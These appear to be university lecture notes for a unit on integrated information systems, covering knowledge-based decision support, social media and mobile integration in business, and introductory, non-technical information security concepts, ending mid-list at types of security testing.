Unit IV

INTEGRATED SYSTEMS, SECURITY AND CONTROL

Syllabus: Knowledge based decision support systems, Integrating social media and mobile
technologies in Information system, Security, IS Vulnerability, Disaster Management, Computer
Crimes, Securing the Web.
Knowledge-Based Decision Support System
Implementing knowledge-based decision support system is one of the best ways to capture,
process and store and share knowledge among employees. The information can be easily
accessed by the user to resolve a variety of problems, issues or concerns.

Before the development of knowledge-driven DSS, employees with high intellect had to
perform knowledge-intensive tasks. An expert in a particular area would know how to
approach a problem and go about it. Similarly, knowledge-based DSS asks relevant
questions, offers suggestions and gives advice to solve a problem. The only difference is that
it’s automated and speeds up the whole process.

What is a Knowledge-Based DSS?

A knowledge-based DSS
▪ is a computer-based reasoning system
▪ that provides information, comprehension and suggestions to users
▪ to support them in decision-making.
It’s an integration of computerized business intelligence tools and technologies customized to
the needs and requirements of an organization. So, the focus is on
▪ Identifying specific knowledge sharing and distribution needs of a company
▪ Setting objectives that need to be attained with a knowledge-driven DSS
▪ The selection of appropriate tools and technologies
▪ Understanding the nature of work and decision-making performed by its potential
users
▪ Selecting data mining techniques
Key Terms and Concepts
A computer-based reasoning system is similar to any other type of decision support system
when it comes to their architecture. But it turns into a knowledge-drive decision support
system when artificial intelligence technologies, management expert systems, data mining
capabilities and other communication mechanisms are integrated.

Before we dig deeper, let’s learn about few important terms and concepts used alongside
knowledge-drive decision support system. This will help gain an in-depth understanding of
such support systems.

1. Expertise: A knowledge-based DSS comes with a specific problem-solving expertise.

This expertise is based upon three components:
▪ Knowledge in a particular domain and associated symptoms and signs
▪ Understanding of the relationships between varied symptoms of a problems
▪ Skills, ways or methods of solving the problem
 2. Expert System: A computer system that imitates the decision making capability of a
human expert is called an expert system or an artificial intelligence system. It is
designed to solve problems by
▪ Using if-then rules
▪ Reasoning about knowledge
▪ Drawing inferences from facts and rules
3. Knowledge Discovery and Data Mining: These are interrelated terms used for the
process of extracting valuable knowledge and discovering patterns, in order to
transform the knowledge into easily comprehendible structure for further use. Data
mining is a buzzword but a misnomer. This is because data mining is a process of
collection, storing and analysis of data and not finding patterns. Knowledge discovery
goes through a series of steps:
▪ Selection
▪ Pre-processing
▪ Transformation
▪ Data mining
▪ Interpretation
4. Development Environment: It’s the environment in which a decision support system
is developed. It typically includes software for creating a DSS and knowledge base.
The development environment may vary in size, depending upon
production/development needs.
5. Domain Expert: A domain expert is a subject matter expert who has
expertise/authority in a particular domain. A domain expert is an integral part of the
team working on developing a decision support system.
6. Knowledge Engineer: A technical expert who integrates knowledge into a computer
system when developing a decision support system, in order to solve complex
problems that require human expertise.
7. Knowledge Acquisition: It is extraction/mining of knowledge from various sources,
such as experts, databases and external programs.
8. Knowledge Base: It is the collection and storage of structured (facts, rules,
regulations, characteristics, functions, procedures and relationships) and unstructured
information that will be used by a DSS in decision making.
9. Interface Engine: It is a software system to simplify the conception and development
of application interfaces between application systems. Typically, it’s a middleware
application to transform, route and translate messages between various
communication points.
10. Heuristic: It’s an approach to discovery and problem solving by employing practical
methods. These methods may not be optimal but can help achieve immediate goals.

It’s important to be familiar with technical jargons that experts in this field use, in order to
gain a deeper understanding of knowledge-based DSS.

Characteristics of Knowledge-based Decision Support Systems

A knowledge-based DSS is different from conventional systems in the way knowledge is
extracted, processed and presented. The former attempts to emulate human reasoning while
the latter responses to an even in a predefined manner. The main characteristics of
knowledge-driven decision support systems are:

▪ These systems aid managers in solving complex problems.

▪ These systems allow users to interact with them during the process of decision
making.
▪ The recommendations made by these systems are based on human knowledge.
▪ These systems use knowledge base that’s engineered keeping in mind the nature of
problems they will solve.
▪ These systems aid in performing limited tasks.
▪ These systems use heuristic technique of problem solving.
Developing Knowledge-Based Decision Support Systems
Knowledge-based decision support systems are expert systems that are developed when
decision-making cannot be supported using traditional methods. A knowledge-based DSS
project goes through various stages and can be difficult to manage. It’s important to be
committed to monitor the development of a knowledge-based DSS.

Development Stages

▪ Domain identification (Choosing a subject matter)

▪ Conceptualization (idea formation, feasibility testing and commencement)
▪ Formalization (beginning with development officially)
▪ Implementation (completion and execution)
▪ Testing (fixing errors and modifications)

It’s important to monitor project development throughout very closely. It’s a collective effort
of knowledge engineers, domain experts, DSS analysts, users and programmers. And a
project manager keeps track of the scope, time, quality and budget, to ensure optimum
allocation of resources and creation of a quality product. A project manager is a person
responsible accomplishing the pre-decided objectives of a project.

Knowledge-Based DSS Examples

Here are few examples of successful and popular knowledge-based decision support systems:

▪ TAXADVISOR: As the name suggests, TAXADVISOR assisted attorneys by

collecting client data and suggested actions that clients need to take to settle their
financial profile. Its job was to aid attorneys in taxation and estate planning for clients
with estates greater than $175,000.
▪ Life Insurance Selection Expert System: The expert system helped Meiji Mutual
Life Insurance Company, one of the oldest insurance companies in Japan, deploys
XpertRule to select the most suitable insurance product for an individual from among
myriads of products.
Integrating Social Medias and Mobile Technology in IS
Social and mobile are two of the largest growth areas in the technology world. Both are
focused on communication, both are undeniably personal and both are very immediate. There
is great synergy between the two areas.
What Is Social Media?
The term social media refers to a computer-based technology that facilitates the sharing of
ideas, thoughts, and information through virtual networks and communities. Social media is
internet-based and gives users quick electronic communication of content, such as personal
information, documents, videos, and photos. Users engage with social media via a computer,
tablet, or smartphone via web-based software or applications. More than 4.5 billion people
use social media, as of October 2021.
Social media originated as a way to interact with friends and family but was later adopted by
businesses that wanted to take advantage of a popular new communication method to reach
out to customers. According to the Pew Research Center, social media users tend to be
younger. Nearly 90% of people between the ages of 18 and 29 used at least one form of
social media.
Types or forms of Social Media
Social media may take the form of a variety of tech-enabled activities. These activities
include photo sharing, blogging, social gaming, social networks, video networks, virtual
worlds, reviews, and much more. Even governments and politicians utilize sharing, business
social media to engage with constituents and voters.
Uses of Social Media – in business
For businesses, social media is an indispensable tool. Companies use the platform to find
and engage with customers, drive sales through advertising and promotion, gauge consumer
trends, and offer customer service or support.
Social media's role in helping businesses is significant. It facilitates communication with
customers, enabling the melding of social interactions on e-commerce sites. Its ability to
collect information helps focus on marketing efforts and market research. It helps in
promoting products and services, as it enables the distribution of targeted, timely, and
exclusive sales and coupons to would-be customers. Further, social media can help in
building customer relationships through loyalty programs linked to social media.
The figures for the most popular social media websites as of January 2021 are as follows:
1. Facebook (2.74 billion users)
2. YouTube (2.29 billion users)
3. WhatsApp (2 billion users)
4. Facebook Messenger (1.3 billion users)
5. Instagram (1.22 billion users)
6. Whatsapp (1.21 billion users)
7. TikTok (689 million users)
8. QQ (617 million users)
9. Douyin (600 million users)
10. Sino Weibo (511 million users)
Business applications of social media
In business, social media is used to market products, promote brands, connect to customers and
foster new business. As a communication platform, social media promotes customer feedback
and makes it easy for customers to share their experiences with a company. Businesses can
respond quickly to positive and negative feedback, address customer problems and maintain or
rebuild customer confidence.

Social media is also used for crowdsourcing. That's the practice of using social networking to
gather knowledge, goods or services. Companies use crowdsourcing to get ideas from
employees, customers and the general public for improving products or developing future
products or services.
Examples of business applications of social media include the following:
• Social media analytics. This is the practice of gathering and analyzing data from blogs and
social media websites to assist in making business decisions. The most common use of social
media analytics is to do customer sentiment analysis.
• Social media marketing (SMM). This application increases a company's brand exposure
and customer reach. The goal is to create compelling content that social media users will
share with their social networks. A key components of SMM is social media optimization
(SMO). SMO is a strategy for drawing new visitors to a website. Social media links and
share buttons are added to content and activities are promoted via status updates, tweets and
blogs.
• Social customer relationship marketing. Social CRM is a powerful business tool. For
example, a Facebook page lets people who like a company's brand to like the business's page.
This, in turn, creates ways to communicate, market and network. Social media sites give
users the option to follow conversations about a product or brand to get real-time market data
and feedback.
• Recruiting. Social recruiting has become a key part of employee recruitment strategies. It is
a fast way to reach a lot of potential candidates, both active job seekers and people who were
not thinking about a job change until they say the recruitment post.
• Enterprise social networking. Businesses also use enterprise social networking to connect
people who share similar interests or activities. Public social media platforms let
organizations stay close to customers and make it easy to conduct market research.
Benefits of social media
Social media provides several benefits, including the following:
• User visibility. Social platforms let people easily communicate and exchange ideas or
content.
• Business and product marketing. These platforms enable businesses to quickly publicize
their products and services to a broad audience. Businesses can also use social media to
maintain a following and test new markets. In some cases, the content created on social
media is the product.
• Audience building. Social media helps entrepreneurs and artists build an audience for their
work. In some cases, social media has eliminated the need for a distributor, because anyone
can upload their content and transact business online.
Mobile Technologies

Mobile technology is a type of technology in which a user utilizes a mobile phone to perform
communications-related tasks, such as communicating with friends, relatives, and others. It is
used to send data from one system to another. Portable two-way communications systems,
computing devices, and accompanying networking equipment make up mobile technology.

Definition: Any gadget with internet capabilities that can be accessed from anywhere is
referred to as mobile technology. Smartphones, tablets, some iPods, and laptops already fall
within this category, but this list will undoubtedly grow in the future years.

Mobile technology is becoming increasingly prevalent. Smartphone users have surpassed 3

billion, and the global mobile workforce is expected to reach 1.87 billion by 2022.
Use of Mobile technology
• The incorporation of mobile technology into business has aided telecollaboration. Now,
people could connect from anywhere using mobile technology, and access the papers and
documents they need to complete collaborative work.
• Employees are no longer confined to their desks; they can work from anywhere in the
world.
• Mobile technology can help your company save time and money. Employees who work
from home save thousands on a regular basis.
• Mobile phones eliminate the need for costly technology like landline carrier services.
• Cloud-based services are less expensive than traditional systems. Technology can also help
your company become more flexible and productive.
• Mobile technology has the potential to boost productivity significantly. Mobile application
integration saves an average of 7.5 hours per week per employee. Workers can also become
more productive with the use of smartphones and mobile gadgets.
• Cloud-based mobile technology applications have been seen to be more useful than any
smartphone, particularly in terms of available storage space.

Integration of Social Media in business

Social media integration gives your audience more ways to engage and interact with your brand.
Social media integration gives your audience more ways to engage and interact with your brand.
You’re creating more opportunities for them to share your content and promote your
products/services for you. The best part: It’s easy to do.

Social Media integration

Definition: Social media integration is the act of using social media accounts as an extension of
your marketing strategy. This is typically accomplished two ways:
i. Directing your social media audience to your website
ii. Allowing your social media accounts to be easily accessed on your website
Think about those social media buttons you see on blog posts and web pages. It allows you to
easily share an interesting piece of content without having to copy and paste the URL. That’s a
perfect example of social media integration in action.
Benefits of Integrating Social Media
Social media integration helps accomplish a few key goals, including increasing your brand
reach and awareness. Social media presents a plethora of opportunities for businesses that can
hugely benefit the brands financially and non-financially. 10 most crucial benefits of
integrating social media.

• Reach a wider audience with extended exposure.

• Amplify your website’s interaction and engagement capabilities.
• Gain insights into consumers’ social behavior.
• Channelize traffic by integrating social media on the website and vice-versa.
• Enhance your website vibrancy through creative visual social content.
• Build brand image & reputation through communications.
• Build social proof by promoting User-generated content from social media.
• Increase your conversions and sales.
• Deliver a superlative consumer experience.

Ways to integrate Social media with your business

Your website and social media should work together seamlessly. This helps promote your brand
while boosting traffic to your social media accounts.

Ways to integrate social media onto your business are.

i. Add social sharing links to your blog posts

These are the social share buttons you see at the bottom of most blog posts. They sometimes also
appear at the top. They help increase awareness of your content, while also giving your readers a
seamless way to share your content. The improved user experience will be a boon to your
website.

ii. Add social posts to your website

One great way to spruce up your website while integrating social media is by including a feed of
social media posts on your pages. These are typically live feeds of your social media posts.
However, you can also use a branded hashtag in order to showcase a feed of posts from your
followers and fans.
 iii. Create a social login option

Have you ever gone to a website that allowed you to login using your Google, Facebook, or
Twitter account? Those are great examples of social logins!
It’s so much easier to use a social media account to login than creating an entirely new profile,
picking a password, and confirming it on your email—only to have to log in again when you’re
done. Instead, it’s just a few clicks at most and you’re in.

Not only is this a great way to integrate social media on your website, but it’s also the way most
people prefer to login. In fact, one study found that 73% of users prefer to login using their social
media accounts.

iv. Place Social Share Plugins on Product Pages

Placing social share plugins on product pages of an e-commerce website is a trending practice.
This is because it helps generate social presence and conversation about the product on the
social media channel.

A social share plugin allows the e-commerce store to place social buttons on a product page.
These buttons when used by a website visitor allow him to share the product page on the
chosen social channel. Among the many other displayed social media feeds on website, the
product page will also be shared successfully.
The social share plugins must be placed in close proximity to the image of the product or
services to enable the website visitor to ‘see easily’ and share it quickly.

v. Embed Social Media Widget on Website

Embedding a social media feed widget on a website is one of the most lucrative approaches for
displaying your social media hashtag feed.
A social media widget is capable of displaying all your social media feeds together at one
place. The brand generated posts and fan-created content (user-generated content) are all
aggregated and extracted by this tool into visually creative social media feeds. Social widget
work par excellently for corporate events, product launch events, promotional influencer
meets, weddings, brand activations and more.

vi. Shoppable Social Media Walls on Website

You can collect & curate social media content on your website but the highlight is that you can
make your social media content SHOPPABLE. Using the visual commerce solutions from
Taggbox, you can tag products into you social media posts or UGC posts and add buying
option and embed it as Shoppable social media gallery on website. This will help you increase
your possibilities of conversions, build brand reliability & trust, boost engagement, and deliver
a peerless shopping experience.

vii. Display Social Media Videos

Videos grab user attention and let the message sink into his mind. Social media videos are
simply videos that are created and shared on social channels. Such videos provide an easy
social media integration on website. Thus you can embed the social media feed of your videos
on your website effortlessly.

viii. Integrate Social Media Based Commenting System

Commenting tools encourage conversations and allow for human-to-human interaction thus
creating a strong authenticity and reliability of the information.

These ‘commenting systems’ are designed in a way that requires commenters to sync one of
their social media accounts for commenting. This way only a genuine profile is linked to your
identity as a commenter and it helps reduce the presence of trolls and spams online.

ix. Showcase Social Media Reviews

Showcasing social proof is simply integrating social reviews and recommendations of your
former customers on your website for your potential buyers and website visitors to see. Social
proof has been said to be trusted by 79% of customers and it also helps augment sales and
website conversions. You can also ask your audience to post a review using your hashtag and
then this hashtag can be used to create a display a live hashtag feed across any marketing
touchpoint!
Social media integration strategies for email marketing

You can integrate social media into your emails. Doing so will allow your readers to easily and
quickly find your social accounts and follow you.

a) Add social sharing links to your footer

Your emails are the perfect place to add social sharing links. Like your website they can go to
the top or the bottom of your email.

b) Remind subscribers of your social community

One great tactic for social media integration is sending out email blasts showcasing your social
media accounts. This is a great way to invite your subscribers to connect socially by
incentivizing them with the benefits of doing so.

c) Bolster social media campaigns with email blasts

Have a social media giveaway or contest? Or maybe you have an audience poll you want peoples
thoughts on? Maybe you’re trying to collect some user-generated content for a blog post? Email
blasts are a great way to promote them. This is when you send a single email to your entire list
asking them to complete a call to action.

Integrating Mobile Technology in Business

The main ways to integrate mobile into your marketing mix include:

Develop a Mobile friendly Web Site

Developing a mobile friendly website is at the core of a mobile marketing strategy. Make your
web presence more mobile friendly or better able to accommodate content specific to a
campaign.

The following table outlines the usages of a mobile optimized web site, the benefits, what to
measure and how to measure the outcomes.

Uses Benefits
• Creating mobile landing pagesfor • Improves engagement
campaigns • Reduces scrolling andslow downloads
• Aiding mobile search results, • Creates hyper local marketing opportunities
especially if mobile site is content
• Enables campaign integrationwith other tactics or mediums
specific
• Is quantifiable—can be trackedthrough analytic programs
• Adopting location based point of
sale or “instant purchase” • Provides ability to reach customers ‘on-the-go’ and create highly
opportunities effective two-way communication
• Engaging in mobile commerce • Provides single greatest return on investment
Texting (SMS/MMS)
Text messaging (SMS) and multimedia messaging (MMS) on feature and smartphones have
been well received. They are widely used, not only for personal use, but also in business,
entertainment and education. Texting is twice as popular as browsing or apps. SMS/MMS
marketing represents a more selective and therefore cost-effective opportunity for either
driving traffic or engaging response. The basis of SMS marketing is to make an appealing
offer; it can be a powerful direct response tool with many applications.

Uses Benefits
• Customer text reminders • Is quick and easy to implement
• Links to mobile coupons, contests • Enables timely and relevantexchange of ideas
• Sale notifications • Is convenient
• Last minute alert offers • Has a broad reach
• Transactions—placing orders, or • 90% of devices support SMS
donating to charity, by text • Creates loyalty or a “following”
• Product/service support • Has CRM capability
• Appointment confirmations
• Mobile surveys, polls

Using SMS/MMS technology offered through smart phones to reach a wider audience.

Mobile Applications (apps)

Mobile applications or apps are compact software programs that perform specific tasks for the
mobile user. Some apps are pre-installed on the mobile device, and others can be downloaded
from a server (e.g. Apple Apps, Blackberry App World, Android Market) or from individual
business/organization websites.

Uses Benefits
• Productivity • Can be highly targeted
• Entertainment • Enable easy interaction and communications to engage customers
• Utilities (e.g. weather app) and build deeper relationships
• Social share communications • Encourage brand recognition
• Location Search GPS • Offer unique leading edge tools

• Mobile commerce

Mobile Display Advertising

Mobile display advertising is another way to reach a distinct audience incrementally, whether
you advertise on popular mobile sites related to your industry or through mobile ad networks
(similar to an ad agency). Mobile display ads can provide a direct link to your online sales
channels, enabling greater integration and post-click engagement, especially when used in
conjunction with an optimized mobile site.
 Mobile display advertising is a form of advertising via mobile (wireless) phones or other mobile
devices. Key elements of mobile advertising include the advertiser, a publisher or mobile ad
network, mobile system operators and mobile devices.

Uses Benefits
• Reaching mobile audience throughbanner • Provides visual display to highlight specific campaigns
ads that sit above mobile site content • Delivers personal and locationrelevant messages
• Working in conjunction with a lead • Drives response andbrand relationships
generation landing page
• Banner placement “above the fold”offers the best
• Offering local coupons or specialsin exposure for the advertiser and can quickly engage the
some form, either in your ads, on your mobile user if the message is targeted to them
site or elsewhere, to drawin customers

Quick Response (QR) Codes and Snap Tags

Quick Response Codes (QR Codes) are two-dimensional bar codes that can be scanned and read
by smartphones.Once mobile users scan or snap a picture of your code, they will be directed to
your web page, shown a video, orreceive SMS text, etc.
QR Codes (Quick Response Codes) are barcode images that, when scanned by a mobile device,
take the viewer to a website or landing page.
Snap tags are customized QR codes in ring configurations that, when scanned, open an
interactive communication.

Uses Benefits
QR Code Usages: • Afford more opportunity for sharing and
• Addition to business cards for more contact building community
detail and directlinks to social media • Bridge the gap between online andoffline media –
• Inclusion in print ad materials toexpand on product e.g. provide more details than can fit on print
or services materials
• Addition to direct mail, event materials for more • Enable quick call to action – e.g. while store is
detailed info closed, passersby can still get information or
receive discount offers
• Placement in storefront windows
• All data collected is reported via an analytics
• Placement on premium itemsSnap Tag Usages:
dashboard andrecorded as attributes in a
• Each code ring position can open up to different consumer database which helps in your CRM
campaigns,response requests or unique reporting efforts
data.
• SnapTags can be used across different media
platforms to delivermarketing campaigns customized
for different consumer segments.
Location Based Service/Geotargeting Mobile Advertising
Geotargeting is a way for your mobile or website to display content-specific information
depending on the location of the user. Through a mobile network that uses geographical
positioning on mobile devices, you can target your marketing by behaviour, knowing where
your prospective target is located, and make offers and calls to action accordingly.
Uses Benefits
• Promoting events • Very effective for attracting
• Responding to user requests forthe nearest service or impulse buyers
business, e.g restaurant, ATM machine • Provides convenience and thusbuilds
• Participating in apps that provide users loyalty
navigation toany street address • Ties in nicely with the global
• Making location-based offers to users of apps that allow positioning software on mostsmart
them to locate “friends” on a map via mobile and feature phones

• Placing mobile ads that appear only when mobile • Location target ads offer more
users are in aparticular area opportunities to reach clients

• Advertising on game apps • Focused ‘local’ strategies can be built

into your marketing mix
• Targeting your Google ads basedon geographical
location or geographical interest

Mobile Commerce asa Business Activity

Mobile commerce, also known as m-commerce, is the conducting of transactional commerce
using a mobile device. Mobile commerce involves new technologies, services and business
models and is quite different from traditional e-commerce. They open the door to many new
applications and services because they accompany users wherever they go. Users can look for a
nearby restaurant, stay in touch with colleagues, or pay for items at a store.

Uses Benefits
• Promoting products or services on mobile • Real-time apps improvecustomer satisfaction
messaging channels, including email, text • Knowing where your users are can help you optimize
messaging,mobile app push notifications, local dealsand shipping logistics
QR Code scanning, and social networks
• Catches impulse buyers
• Texting SMS to deliver product or
• Allows for instant customerservice interaction
promotional information alerts, track
inquiries and receive order status updates • Builds consumer loyalty throughadded convenience
Security
All sorts of data whether it is government, corporate, or personal need high security; however,
some of the data, which belongs to the government defense system, banks, defense research and
development organization, etc. are highly confidential and even small amount of negligence to
these data may cause great damage to the whole nation. Therefore, such data need security at a
very high level.
The protection of information systems against unauthorized access to or modification of
information, whether in storage, processing or transit, and against the denial of service to
authorized users, including those measures necessary to detect, document, and counter such
threats.
Definition: Information systems security refers to the processes and methodologies involved
with keeping information confidential, available and assuring its integrity.

It also refers to:

• Access controls, which prevent unauthorized personnel from entering or accessing a

system.
• Protecting information no matter where that information is, i.e. in transit (such as in an
email) or in a storage area.
• The detection and remediation of security breaches, as well as documenting those events.

Information systems security does not just deal with computer information, but also protecting
data and information in all of its forms.
Objectives of Information System Security
There are 3 main objectives, commonly known as CIA – Confidentiality, Integrity and
Availability. It is also called as the Information Security Triad (CIA).

1. Confidentiality – means information is not disclosed to unauthorized individuals, entities

and process..
2. Integrity – means maintaining accuracy and completeness of data. This means data cannot
be edited in an unauthorized way..
3. Availability – means information must be available when needed..

Security Threats to Information Systems

A computer system threat is anything that leads to loss or corruption of data or physical damage
to the hardware and/or infrastructure.
What is a Security Threat?
Security Threat is defined as a risk that which can potentially harm computer systems and
organization. The cause could be physical such as someone stealing a computer that contains
vital data. The cause could also be non-physical such as a virus attack. we will define a threat as
a potential attack from a hacker that can allow them to gain unauthorized access to a computer
system.
What are Physical Threats?
A physical threat is a potential cause of an incident that may result in loss or physical damage to
the computer systems.
The following list classifies the physical threats into three (3) main categories;
• Internal: The threats include fire, unstable power supply, humidity in the rooms housing
the hardware, etc.
• External: These threats include Lightning, floods, earthquakes, etc.
• Human: These threats include theft, vandalism of the infrastructure and/or hardware,
disruption, accidental or intentional errors.
To protect computer systems from the above mentioned physical threats, an organization must
have physical security control measures.
The following list shows some of the possible measures that can be taken:
• Internal: Fire threats could be prevented by the use of automatic fire detectors and
extinguishers that do not use water to put out a fire. The unstable power supply can be
prevented by the use of voltage controllers. An air conditioner can be used to control the
humidity in the computer room.
• External: Lightning protection systems can be used to protect computer systems against
such attacks. Lightning protection systems are not 100% perfect, but to a certain extent,
they reduce the chances of Lightning causing damage.
• Humans: Threats such as theft can be prevented by use of locked doors and restricted
access to computer rooms.
What are Non-physical threats?
A non-physical threat is a potential cause of an incident that may result in;
• Loss or corruption of system data
• Disrupt business operations that rely on computer systems
• Loss of sensitive information
• Illegal monitoring of activities on computer systems
• Cyber Security Breaches and Others
The non-physical threats are also known as logical threats. The following list is the common
types of non-physical threats;
• Virus • Unauthorized access to computer
• Trojans systems resources such as data
• Worms • Phishing
• Spyware • Other Computer Security Risks
• Key loggers
• Adware
• Denial of Service Attacks
• Distributed Denial of Service
Attacks
To protect computer systems from the above-mentioned threats, an organization must
have logical security measures in place.
To protect against viruses, Trojans, worms, etc. an organization can use anti-virus software.
In additional to the anti-virus software, an organization can also have control measures on the
usage of external storage devices and visiting the website that is most likely to download
unauthorized programs onto the user’s computer.
Unauthorized access to computer system resources can be prevented by the use of
authentication methods. The authentication methods can be, in the form of user ids and strong
passwords, smart cards or biometric, etc.
Intrusion-detection/prevention systems can be used to protect against denial of service
attacks. There are other measures too that can be put in place to avoid denial of service attacks.
Tools for Security
In order to ensure the confidentiality, integrity, and availability of information, organizations can
choose from a variety of tools.

i) Authentication
Authentication can be accomplished by identifying someone through one or more of three
factors: i) something they know, ii) something they have and iii) something they are.
For example, the most common form of authentication today is the user ID and password.
Identifying someone only by something they have, such as a key or a card, can also be
problematic. When that identifying token is lost or stolen, the identity can be easily stolen.
The final factor, something you are, is much harder to compromise. This factor identifies a user
through the use of a physical characteristic, such as an eye-scan or fingerprint. Identifying
someone through their physical characteristics is called biometrics.
ii) Access Control

Once a user has been authenticated, the next step is to ensure that they can only access the
information resources that are appropriate. This is done through the use of access control. Access
control determines which users are authorized to read, modify, add, and/or delete information.
Several different access control models exist.
iii) Encryption

Many times, an organization needs to transmit information over the Internet or transfer it on
external media such as a CD or flash drive. In these cases, even with proper authentication and
access control, it is possible for an unauthorized person to get access to the data.
Encryption is a process of encoding data upon its transmission or storage so that only authorized
individuals can read it. This encoding is accomplished by a computer program, which encodes
the plain text that needs to be transmitted; then the recipient receives the cipher text and decodes
it (decryption). In order for this to work, the sender and receiver need to agree on the method of
encoding so that both parties can communicate properly. Both parties share the encryption key,
enabling them to encode and decode each other’s messages. This is called symmetric key
encryption. This type of encryption is problematic because the key is available in two different
places.
iv) Password Security
It turns out that this single-factor authentication is extremely easy to compromise. Good
password policies must be put in place in order to ensure that passwords cannot be compromised.
Below are some of the more common policies that organizations should put in place.
• Require complex passwords.
• Change passwords regularly.
• Train employees not to give away passwords.
v) Backups
Another essential tool for information security is a comprehensive backup plan for the entire
organization. Not only should the data on the corporate servers be backed up, but individual
computers used throughout the organization should also be backed up. A good backup plan
should consist of several components.
• A full understanding of the organizational information resources.
• Regular backups of all data. Critical data should be backed up daily, while less critical
data could be backed up weekly.
• Offsite storage of backup data sets. It is essential that part of the backup plan is to store
the data in an offsite location.
• Test of data restoration. This will ensure that the process is working and will give the
organization confidence in the backup plan.
Additional concepts related to backup include the following:
• Universal Power Supply (UPS). A UPS is a device that provides battery backup to
critical components of the system, allowing them to stay online longer and/or allowing
the IT staff to shut them down using proper procedures in order to prevent the data loss
that might occur from a power failure.

vi) Firewalls

Another method that an organization should use to increase security on its network is a firewall.
A firewall can exist as hardware or software (or both).
A hardware firewall is a device that is connected to the network and filters the packets based on a
set of rules.
A software firewall runs on the operating system and intercepts packets as they arrive to a
computer.
A firewall protects all company servers and computers by stopping packets from outside the
organization’s network that do not meet a strict set of criteria. A firewall may also be configured
to restrict the flow of packets leaving the organization. This may be done to eliminate the
possibility of employees watching YouTube videos or using Facebook from a company
computer.
vii) Intrusion Detection Systems

Another device that can be placed on the network for security purposes is an intrusion detection
system, or IDS. An IDS does not add any additional security; instead, it provides the
functionality to identify if the network is being attacked. An IDS can be configured to watch for
specific types of activities and then alert security personnel if that activity occurs.
viii) Sidebar: Virtual Private Networks

A VPN allows a user who is outside of a corporate network to take a detour around the firewall
and access the internal network from the outside. Through a combination of software and
security measures, this lets an organization allow limited access to its networks while at the same
time ensuring overall security.
Physical Security

Physical security is the protection of the actual hardware and networking components that store
and transmit information resources. To implement physical security, an organization must
identify all of the vulnerable resources and take measures to ensure that these resources cannot
be physically tampered with or stolen. These measures include the following.
• Locked doors: It may seem obvious, but all the security in the world is useless if an
intruder can simply walk in and physically remove a computing device. High-value
information assets should be secured in a location with limited access.
• Physical intrusion detection: High-value information assets should be monitored through
the use of security cameras and other means to detect unauthorized access to the physical
locations where they exist.
• Secured equipment: Devices should be locked down to prevent them from being stolen.
One employee’s hard drive could contain all of your customer information, so it is
essential that it be secured.
• Environmental monitoring: An organization’s servers and other high-value equipment
should always be kept in a room that is monitored for temperature, humidity, and airflow.
The risk of a server failure rises when these factors go out of a specified range.
• Employee training: One of the most common ways thieves steal corporate information is
to steal employee laptops while employees are traveling. Employees should be trained to
secure their equipment whenever they are away from the office.

Security Policies

Besides the technical controls listed above, organizations also need to implement security
policies as a form of administrative control. In fact, these policies should really be a starting
point in developing an overall security plan. A good information-security policy lays out the
guidelines for employee use of the information resources of the company and provides the
company recourse in the case that an employee violates a policy.
A security policy should be based on the guiding principles of confidentiality, integrity, and
availability.
A good example of a security policy that many will be familiar with is a web use policy. A web
use policy lays out the responsibilities of company employees as they use company resources to
access the Internet. A security policy should also address any governmental or industry
regulations that apply to the organization.

Cyber Security
Cyber security is a well-designed technique to protect computers, networks, different programs,
personal data, etc., from unauthorized access.
How to Secure Data?
Let us now discuss how to secure data. In order to make your security system strong, you need
to pay attention to the following −
• Security Architecture
• Network Diagram
• Security Assessment Procedure
• Security Policies
• Risk Management Policy
• Backup and Restore Procedures
• Disaster Recovery Plan
• Risk Assessment Procedures
Once you have a complete blueprint of the points mentioned above, you can put better security
system to your data and can also retrieve your data if something goes wrong.

Information System Security

IS security refers to measures put in place to protect information system resources from
unauthorized access or being compromised. Security vulnerabilities are weaknesses in a
computer system, software, or hardware that can be exploited by the attacker to gain
unauthorized access or compromise a system.

Let's now look at some of the threats that information system face

Computer Viruses – these are malicious programs as described in the above section. The
threats posed by viruses can be eliminated or the impact minimized by using Anti-Virus software
and following laid down security best practices of an organization.

Unauthorized Access – the standard convention is to use a combination of a username and a

password. Hackers have learnt how to circumvent these controls if the user does not follow
security best practices. Most organizations have added the use of mobile devices such as phones
to provide an extra layer of security.

Data Loss – if the data center caught fire or was flooded, the hardware with the data can be
damaged, and the data on it will be lost. As a standard security best practice, most organizations
keep backups of the data at remote places. The backups are made periodically and are usually put
in more than one remote area.

Biometric Identification – this is now becoming very common especially with mobile devices
such as smartphones. The phone can record the user fingerprint and use it for authentication
purposes. This makes it harder for attackers to gain unauthorized access to the mobile device.
Such technology can also be used to stop unauthorized people from getting access to your
devices.

Hacking - Hacking refers to the misuse of devices like computers, smartphones, tablets, and
networks to cause damage to or corrupt systems, gather information on users, steal data and
documents, or disrupt data-related activity.

Definition: Hacking is an attempt to exploit a computer system or a private network inside a

computer. Simply put, it is the unauthorised access to or control over computer network security
systems for some illicit purpose.

Types of hackers
In general computer parlance, they are classified as white hats, black hats and grey hats hackers.
White hat hackers hack to check their own security systems to make it more hack-proof.
Black hat hackers hack to take control over the system for personal gains. They can destroy,
steal or even prevent authorized users from accessing the system.
Grey hat hackers are curious people who have just about enough computer language skills to
enable them to hack a system to locate potential loopholes
What is Ethical Hacking?
Ethical Hacking is identifying weakness in computer systems and/or computer networks and
coming with countermeasures that protect the weaknesses. Ethical hackers must abide by the
following rules.
• Get written permission from the owner of the computer system and/or computer
network before hacking.
• Protect the privacy of the organization been hacked.
• Transparently report all the identified weaknesses in the computer system to the
organization.
• Inform hardware and software vendors of the identified weaknesses.
Why Ethical Hacking?
• Information is one of the most valuable assets of an organization. Keeping information
secure can protect an organization’s image and save an organization a lot of money.
• Hacking can lead to loss of business for organizations that deal in finance such as PayPal.
Ethical hacking puts them a step ahead of the cyber criminals who would otherwise lead
to loss of business.
What is Security Testing?
Security testing is a testing technique to determine if an information system protects data and
maintains functionality as intended. It also aims at verifying 6 basic principles as listed below:
• Confidentiality • Authorization
• Integrity • Availability
• Authentication • Non-repudiation

Security Testing is a type of Software Testing that uncovers vulnerabilities, threats, risks in a
software application and prevents malicious attacks from intruders. The purpose of Security
Tests is to identify all possible loopholes and weaknesses of the software system which might
result in a loss of information, revenue, repute at the hands of the employees or outsiders of the
Organization.
The goal of security testing is to identify the threats in the system and measure its potential
vulnerabilities, so the system does not stop functioning or is exploited. It also helps in detecting
all possible security risks in the system and help developers in fixing these problems through
coding.
Types of Security Testing:
There are seven main types of security testing as per Open Source Security Testing methodology
manual. They are explained as follows:
